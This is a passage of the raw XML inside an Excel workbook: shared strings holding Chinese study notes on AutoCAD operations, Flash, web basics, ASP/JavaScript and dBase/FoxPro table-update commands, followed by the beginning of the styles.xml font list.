    <t>选定---右键按住拖动---选择：复制到此处或移动到此处（选项---用户系统配置---绘图区域中使用快捷菜单：自定义右键设置---命令模式：快捷菜单（不能是“确认”））</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>自定义块：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>B---命名---基点---对象（选择）；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>使用块：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>绘图---点---定数点分（或定距点分）---选择对象---B---B名---是否对齐---输入线段数目（输入线段长度）</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>相对于某a点开始某b点：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>命令（如圆）---捕捉自（对象捕捉工具栏）---点击A点---@：相对坐标（B点相对于A点的位置）；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>利用夹点进行旋转复制</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>确定某一夹点做为基点---右击---旋转---C，回车---指点角度如：15,回车；---重复（指点角度如：-15）</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>修改---拉长---DE---输入拉长值---选择需要拉长的目标（如果是直线，则需分别选择两头，如果点两次，则会拉长两次）(负值即缩短)</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>自定义UCS</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UCS，回车---Z，回车----22,回车；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>对象捕捉快捷快捷键：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>shift+右击；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CAD tips</t>
  </si>
  <si>
    <t>标注</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>按范围缩放显示的快捷键：Z，回车---E，回车；：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>多线：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>14.1 设置多线样式：格式---多线样式---新建---命名---继续：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>14.3 绘图---多线---分别设置：对正、比例、样式；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>a 图元设置：偏移、颜色、线形；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>b 封口设置：起点、端点，可分别设置为直线、内弧、外弧；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>如：S1：封口起点：直线；端点：直线+外弧；两条线分别偏移0.5；S：1500,长：370；则绘制的多线为一个1500*370的矩形加一个直径为1500的圆弧；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>flash</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>主要组件是图层、帧和播放头，它类似于一个时间从左向右推移的电子表格，它用列表示时间，用行表示图层，在舞台上较高图层中的内容显示在较低图层中的内容的上面；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>flash 时间轴</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>flash 时间轴</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>互联网：即相互联接的网络，包括因特网；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>因特网：最大的互联网，有十三台根服务器其中11台在美国；包括万维网服务；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>万维网：因特网中的一种网络服务，即网页；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>网站要存储在独立的服务器或服务器的虚拟主机上才可以被访问，网站由域名和空间构成；衡量一个网站性能的主要方面：空间大小，网站位置，网站连接速度，网站软件配置，网站提供的服务；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>dreamweaver基础</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>dreamweaver基础</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>脚本</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>script指的是一系列的命令和指令，它与HTML标识的主要区别在于脚本可以完成数据的运算和执行操作，而HTML标识只能执行对文件的简单格式化，或是对图形、视频和音频文件的简单读取；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ASP文件</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>对过标记对把VB Script或Java Script语言的程序嵌入文档中，当服务器遇到这对标记时，便将其视为程序来解释执行，然后把执行的结果传送到客户机上供用户浏览；ASP不是编程语言，而是一种开发环境，提供了一个在服务器端执行指令的环境，它利用特殊的符号（）来区分HTML与必须经过服务器翻译才能送往客户端的命令;它执行的指令包括HTML语言，MS VBScript,MS Javascript等，因此可以制作功能强大的WEB应用程序；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Java script</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>是一种基于对象和事件驱动并具有安全性能的脚本语言；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ASP脚本只能运行有server端，而VBScript和Javascript可運行在client端；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CAD</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>设有student.dbf(有字段：学号、姓名、民族）和score.dbf(有字段：学号、成绩）两个表，若要在它们之间建立逻辑连接，然后为每个少数民族考生的成绩增加5分，最后显示全体考生的学号、姓名和成绩：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>select 1</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>use student</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>index on 学号 to idx</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>select 2</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>use score</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>set relation to 学号 into A</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>replace 成绩 with 成绩+5 for A-&gt;民族&lt;&gt;"汉"</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>list 学号，A.姓名，成绩</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>库存表stock.dbf(包括的字段：商品编号、名称、库存最、单价、总金额)</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>出入库表inout.dbf(包括的字段：商品编号、进出数量)</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>通过以下命令序列，使之根据每日inout.dbf中的商品进出数量，来更新stockl.dbf中的记录内容；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>use stock</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>index on 商品编号 to A1</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>sele B</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>use inout</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>sele A</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>update on 商品编号 from B replace 库存量 with 库存量+B.进出数量,总金额 with 库存量*单价 ramdom</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>延伸</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>先选择延伸的边---延伸的对象，需指向延伸边的一端；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>注1：画建筑平面图时，可用单线作为尺寸线，画在尺寸线图层内；可用多线画墙体线，设置墙体线图层，封口为直线，两线偏移为0.5,150的增加设置比例为150；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>注2：多线可以分解，进行单独的编辑；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2 标注可设置的图层；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>3标注的引线可利用夹点进行拖动；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1 设置标注样式：标注---标注样式---修改---调整（选项卡），使用全局比例：（最大值/300）*2（或除于100,再打个5折，（文字样式的高度要*2））</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>文字格式</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1 设置样式：最大值/300）*2（或除于100,再*2）</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2 如果用单层文字输入是？时，可选择用多行文字输入；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>取消最近一次操作：U</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>在等轴侧中，三个轴向的绽放比例相等，并且三个轴侧轴与水平方向所成的角度分别为30,90,150.在三个轴侧轴中，每两个轴侧轴定义一个“”轴侧面“，如图所示，它们分别是：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1 左视图：捕捉和栅格沿90和150度轴对齐；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2 俯视图：捕捉和栅格沿30和150度轴对齐；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>3 右视图：捕捉和栅格沿30和90度轴对齐；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>按F5键可切换等轴侧左（右）视图</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>边界：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>绘图---边界</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>拾取点：---对象类型：可以是多线段；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>14.2 将设置的多线样式置为当前，当需要使用另一个多线样式时，需要再次打开格式---多线样式---选择样式名---置为当前，也可以在样式选项中直接地输入样式名；如果一个样式名要s1已有使用，则不能再修改，但可新建一个样式s3，以S1为基础，查看S1的设置；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>注3：多线的宽度等于：（第一条的偏移量-最未一条的偏移量）*比例S</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>打印预览</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>文件---页面设置管理器---新建---命名---设置相关参数---确定；此时即可进行打印预览了；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>绘制等轴侧图形</t>
  </si>
  <si>
    <t>绘制等轴侧图形</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CAD</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
</sst>
</file>

<file path=xl/styles.xml><?xml version="1.0" encoding="utf-8"?>
<styleSheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
  <numFmts count="3">
    <numFmt numFmtId="176" formatCode="0&quot;pcs&quot;"/>
    <numFmt numFmtId="177" formatCode="[Red]0.00&quot;pcs&quot;"/>
    <numFmt numFmtId="178" formatCode="[DBNum2][$-804]General"/>
  </numFmts>
  <fonts count="128">
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="宋体"/>
      <family val="2"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="9"/>
      <name val="宋体"/>
      <family val="2"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="宋体"/>
      <family val="2"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <u/>
      <sz val="11"/>
      <color theme="10"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="8"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <vertAlign val="superscript"/>
      <sz val="11"/>
      <color theme="1"/>
      <name val="宋体"/>
      <family val="2"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <vertAlign val="superscript"/>
      <sz val="11"/>
      <color theme="1"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="9"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <u/>
      <sz val="11"/>
      <color theme="10"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <color theme="1"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <u/>
      <sz val="12"/>
      <color theme="1"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <u/>
      <sz val="11"/>
      <color theme="1"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF000000"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF3366CC"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <u/>
      <sz val="11"/>
      <color theme="1"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="0"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="8"/>
      <color theme="1"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <color theme="1"/>
      <name val="宋体"/>
      <family val="2"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="9"/>
      <color theme="1"/>
      <name val="宋体"/>
      <family val="2"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <u/>
      <sz val="12"/>
      <color theme="1"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="8"/>
      <color rgb="FF3366CC"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="7"/>
      <color rgb="FF666666"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10.5"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10.5"/>
      <color theme="1"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="7"/>
      <color theme="1"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <u/>
      <sz val="12"/>
      <color theme="10"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="12"/>
      <color theme="1"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="13.5"/>
      <color theme="1"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="7"/>
      <color rgb="FF660000"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="7"/>
      <color rgb="FF663300"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="7"/>
      <color rgb="FF663300"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="7"/>
      <color rgb="FF988C3A"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="7"/>
      <color rgb="FFB01919"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="7"/>
      <color rgb="FF990000"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="7"/>
      <color rgb="FF0000FF"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="7"/>
      <color rgb="FFCC0099"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="7"/>
      <color rgb="FF000000"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="7"/>
      <color rgb="FF000000"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <color rgb="FF663300"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="42"/>
      <color theme="1"/>
      <name val="宋体"/>
      <family val="2"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="36"/>
      <color theme="1"/>
      <name val="宋体"/>
      <family val="2"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="26"/>
      <color theme="1"/>
      <name val="宋体"/>
      <family val="2"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="24"/>
      <color theme="1"/>
      <name val="宋体"/>
      <family val="2"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="22"/>
      <color theme="1"/>
      <name val="宋体"/>
      <family val="2"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="18"/>
      <color theme="1"/>
      <name val="宋体"/>
      <family val="2"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="14"/>
      <color theme="1"/>
      <name val="宋体"/>
      <family val="2"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="12"/>
      <color theme="1"/>
      <name val="宋体"/>
      <family val="2"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="10.5"/>
      <color theme="1"/>
      <name val="宋体"/>
      <family val="2"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="7.5"/>
      <color theme="1"/>
      <name val="宋体"/>
      <family val="2"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="6.5"/>
      <color theme="1"/>
      <name val="宋体"/>
      <family val="2"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="16"/>
      <color rgb="FF000000"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="15"/>
      <color rgb="FF000000"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color theme="1"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color rgb="FFFF0000"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <u/>
      <sz val="11"/>
      <color rgb="FFFF0000"/>
      <name val="宋体"/>
      <family val="2"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <u/>
      <sz val="11"/>
      <color theme="1"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="8"/>
      <color theme="1"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color rgb="FF323E32"/>
      <name val="Simsun"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF323E32"/>
      <name val="Simsun"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF323E32"/>
      <name val="Simsun"/>
      <family val="3"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <color rgb="FF323E32"/>
      <name val="Simsun"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="12"/>
      <color rgb="FF323E32"/>
      <name val="Simsun"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="12"/>
      <color rgb="FFFF0000"/>
      <name val="Simsun"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="宋体"/>
      <family val="2"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <color rgb="FFFF00FF"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="8"/>
      <color rgb="FF040010"/>
      <name val="Verdana"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="12"/>
      <color rgb="FFFF00FF"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF323E32"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color rgb="FFFF0000"/>
      <name val="Simsun"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FFFF0000"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FFFF0000"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="10.5"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="10.5"/>
      <color theme="1"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <u/>
      <sz val="10.5"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <u/>
      <sz val="10.5"/>
      <color theme="1"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <u/>
      <sz val="12"/>
      <color theme="1"/>
      <name val="宋体"/>
      <family val="2"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <u/>
      <sz val="12"/>
      <color rgb="FF323E32"/>
      <name val="Simsun"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="10.5"/>
      <color rgb="FFFF0000"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="10.5"/>
      <color rgb="FFFF0000"/>
      <name val="Calibri"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FFFF0000"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="10"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
    </font>
    <font>
      <shadow/>
      <sz val="12"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="12"/>
      <color theme="1"/>
      <name val="仿宋"/>
      <family val="3"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="仿宋"/>
      <family val="3"/>
      <charset val="134"/>
    </font>
    <font>
      <shadow/>
      <sz val="12"/>
      <name val="宋体"/>
      <family val="2"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color theme="1"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="12"/>
      <color theme="1"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="12"/>
      <color theme="1"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF002060"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FFFF0000"/>
      <name val="宋体"/>
      <family val="2"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <color rgb="FF000000"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
    </font>
    <font>
      <u/>
      <sz val="8"/>
      <color theme="10"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF28386C"/>
      <name val="Verdana"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF28386C"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="9"/>
      <color theme="1"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="8"/>
      <color rgb="FF333333"/>
      <name val="Verdana"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="7"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="8"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="8"/>
      <color rgb="FF000000"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="7"/>
      <color rgb="FF000000"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="8"/>
      <color rgb="FF000000"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="8"/>
      <color rgb="FFFF0000"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="8"/>
      <color rgb="FFFF0000"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color rgb="FF000000"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="9"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="8"/>
      <color rgb="FF3366CC"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <u/>
      <sz val="10.5"/>
      <color rgb="FFFF0000"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <u/>
      <sz val="10.5"/>
      <color rgb="FFFF0000"/>
      <name val="Calibri"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <u/>
      <sz val="12"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <u/>
      <sz val="12"/>
      <color theme="1"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <i/>
      <u/>
      <sz val="12"/>
      <color theme="1"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="8"/>
      <color rgb="FF333333"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="7"/>
      <color theme="1"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="11"/>
      <name val="宋体"/>
      <family val="3"/>
